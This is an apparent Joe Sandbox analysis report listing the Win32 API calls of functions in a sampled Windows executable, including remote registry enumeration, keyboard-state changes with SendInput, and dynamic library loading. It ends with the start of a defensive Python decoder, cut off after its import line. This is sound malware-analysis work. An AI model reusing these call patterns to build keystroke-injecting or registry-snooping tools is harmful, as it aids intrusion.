• Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
• Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcstok.LIBCMT ref: 004675B2
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcscpy.LIBCMT ref: 00467641
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcslen.LIBCMT ref: 004677BD
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
• String ID: X
• API String ID: 780548581-3081909835
• Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
• Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
• Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
• Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
• Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• String ID:
• API String ID: 2027346449-0
• Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
• Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
• String ID:
• API String ID: 3257027151-0
• Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
• Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
• Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
• Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
• Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
• Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
• Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 87235514-0
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Strings
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: ou
• API String ID: 2449869053-3837949563
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Similarity
• API ID: Window$Enable$Show$MessageMoveSend
• String ID:
• API String ID: 896007046-0
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
• GetFocus.USER32 ref: 00448ACF
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
APIs
  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• KillTimer.USER32(?,?,?,?,?), ref: 004012D3
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
Similarity
• API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 3300667738-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\VH
• API String ID: 3164766367-2432546070
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Similarity
• API ID: AllocateHeap_free_malloc
• String ID: [B
• API String ID: 1020059152-632041663
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413DA4
• __calloc_crt.LIBCMT ref: 00413DB0
• __getptd.LIBCMT ref: 00413DBD
• CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
• _free.LIBCMT ref: 00413E07
• __dosmaperr.LIBCMT ref: 00413E12
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413D20
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 259663610-0
APIs
• GetClientRect.USER32(?,?), ref: 004302E6
• GetWindowRect.USER32(00000000,?), ref: 00430316
• GetClientRect.USER32(?,?), ref: 00430364
• GetSystemMetrics.USER32(0000000F), ref: 004303B1
• GetWindowRect.USER32(?,?), ref: 004303C3
• ScreenToClient.USER32(?,?), ref: 004303EC
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
                                                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1612042205-0
                                                                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strncmp
                                                                                                        • String ID: >$U$\
                                                                                                        • API String ID: 2666721431-237099441
                                                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 2221674350-0
                                                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2037614760-0
                                                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                        • String ID:
                                                                                                        • API String ID: 960795272-0
                                                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                        APIs
                                                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189319755-0
                                                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
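The API listings above print only raw hexadecimal arguments, so the keyboard routine at 0044C570-0044C6C2 (GetKeyboardState, SetKeyboardState, three PostMessageW calls, SendInput) and the control-message routine at 0044908B-004490E1 (SendMessageW with 0x1024, 0x0409 and 0x111E) have to be decoded by hand. The following decoder is an added example written for this page; it is not code from the Joe Sandbox report or from the analysed sample. It parses the report's `<Api>.<MODULE>(<args>), ref: <addr>` lines, names the Win32 message constants it recognises (values taken from the Win32 SDK headers; unknown ones such as 0x0409 are passed through as raw hex rather than guessed), reads the `SendInput` cbSize argument 0x1C as a 28-byte 32-bit `INPUT` structure, and applies a heuristic of this example's own devising, not a Joe Sandbox signature, to flag the keyboard-state plus WM_KEYDOWN/WM_CHAR plus SendInput combination as synthetic keystroke injection. The sample listings embedded in the code are copied from this report's own function entries; the constant tables, names and heuristic are the example's assumptions.

```python
"""Decode the 'APIs' entries of a Joe Sandbox function listing.

Added example; not code from the Joe Sandbox report or from the analysed sample.
Parses lines of the form '<Api>.<MODULE>(<hex args>), ref: <addr>', names the Win32
message/flag constants those calls receive, and flags the keyboard-state +
PostMessage(WM_KEY*) + SendInput combination as synthetic keystroke injection.
The heuristic in flags_keystroke_injection is an assumption of this example.
"""
import re
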